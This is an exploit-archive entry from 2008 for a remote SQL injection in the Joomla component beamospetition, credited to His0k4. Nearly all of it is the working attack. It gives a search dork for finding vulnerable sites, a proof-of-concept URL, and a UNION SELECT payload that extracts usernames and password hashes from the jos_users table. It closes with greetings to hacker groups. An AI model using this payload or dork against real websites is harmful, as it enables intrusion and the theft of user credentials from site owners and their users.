|
|
| Details : ExploitAlert |
|
|
Topic : | Joomla Component beamospetition Remote SQL Injection Vulnerability
|
ExploitAlert : 4223
Milw0rm ID : 5965
Credit : His0k4
Date : 29.6.2008
Download
 Exploit Code : /---------------------------------------------------------------\
\ /
/ Joomla Component beamospetition Remote SQL injection \
\ /
\---------------------------------------------------------------/
[*] Author : His0k4 [ALGERIAN HaCkEr]
[*] Dork : inurl:com_beamospetition
[*] POC :
http://localhost/[Joomla_Path]/index.php?option=com_beamospetition&pet={SQL
}
[*] Example :
http://localhost/[Joomla_Path]/index.php?option=com_beamospetition&pet=-5
UNION SELECT
user(),user(),user(),user(),user(),user(),user(),concat(username,0x3a,passw
ord),user(),user(),user(),user(),user(),user(),user() FROM jos_users--
---------------------------------------------------------------------------
-
[*] Greetings : All friends & muslims HaCkeRs...
[*] Greetings2: http://www.dz-secure.com
http://palcastle.org/cc
|
|
|
|